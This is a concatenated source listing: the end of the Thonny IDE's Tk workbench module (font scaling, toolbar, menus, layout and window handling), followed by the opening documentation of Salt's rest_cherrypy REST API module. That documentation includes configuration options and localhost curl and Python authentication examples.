elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
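# Worked example of the conversion above (illustrative numbers): with a
# default Tk scaling of 1.33 and a user-chosen scaling of 2.0, a Linux system
# font reported as size -12 (12 px) is first converted to 12 / 1.33 ~= 9 pt
# and then scaled by 2.0 / 1.33 ~= 1.5, ending up at roughly 14 pt.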
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Tk doesn't update Treeview row height properly, at least not in Linux Tk
style = ttk.Style()
style.configure("Treeview", rowheight=self._compute_treeview_rowheight())
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _compute_treeview_rowheight(self):
default_font = tk_font.nametofont("TkDefaultFont")
return round(default_font.metrics("linespace") * 1.15)
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, ems_to_pixels(1))
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# previously selected widget would be better candidate, but this is
# better than button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self, event=None) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception as e:
logger.exception(
"Could not check command tester for '%s'", item_data, exc_info=e
)
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception as e:
logger.exception("Problem processing ipc request", exc_info=e)
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
temp_dir = self.get_temp_dir(create_if_doesnt_exist=False)
if os.path.exists(temp_dir):
try:
shutil.rmtree(temp_dir)
except Exception as e:
logger.error("Could not remove temp dir", exc_info=e)
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
runner = get_runner()
if runner != None:
runner.destroy_backend()
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logger.exception("Error while destroying workbench")
finally:
super().destroy()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
if isinstance(val, KeyboardInterrupt):
# no need to report this, just let it close
return
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logger.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if (
self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS
) and view_name in self._view_records:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor is not None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
if running_on_mac_os() and editor is not None:
current_file = editor.get_filename()
if current_file and is_local_path(current_file) and os.path.exists(current_file):
self.wm_attributes("-titlepath", current_file)
else:
self.wm_attributes("-titlepath", "")
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all of the following is required
# to ensure the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when a new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
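# Illustrative examples of URLs accepted above (paths/topics are hypothetical):
#     thonny-editor:///home/user/prog.py       -> open the file
#     thonny-editor:///home/user/prog.py#10:4  -> open the file at line 10, col 4
#     thonny-help://debugging#breakpoints      -> load the topic into HelpView
#     debugging.rst                            -> same, via the local-.rst branch
# Anything else is passed to webbrowser.open().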
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
def get_temp_dir(self, create_if_doesnt_exist=True):
path = os.path.join(THONNY_USER_DIR, "temp")
if create_if_doesnt_exist:
os.makedirs(path, exist_ok=True)
return path
def _init_hooks(self):
self._save_hooks = []
self._load_hooks = []
def append_save_hook(self, callback):
self._save_hooks.append(callback)
def append_load_hook(self, callback):
self._load_hooks.append(callback)
def iter_save_hooks(self):
return iter(self._save_hooks)
def iter_load_hooks(self):
return iter(self._load_hooks)
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
app.py
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms, and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
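For example, an illustrative request to the ``/run`` endpoint that sends the
eauth credentials together with the command instead of a session token (the
credentials and eauth backend below are placeholders; adjust for your setup):
.. code-block:: bash
    curl -sSk https://localhost:8000/run \\
        -H 'Accept: application/x-yaml' \\
        -d client=local \\
        -d tgt='*' \\
        -d fun=test.ping \\
        -d username=saltdev \\
        -d password=saltdev \\
        -d eauth=auto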
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
but cannot express complex data structures, which some Salt commands require --
for example, starting a state run that uses Pillar data. Salt's CLI tool can
reformat strings passed at the command line into complex data structures, and
that behavior also works via salt-api, but it can be brittle; since salt-api
accepts JSON, it is best to just send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
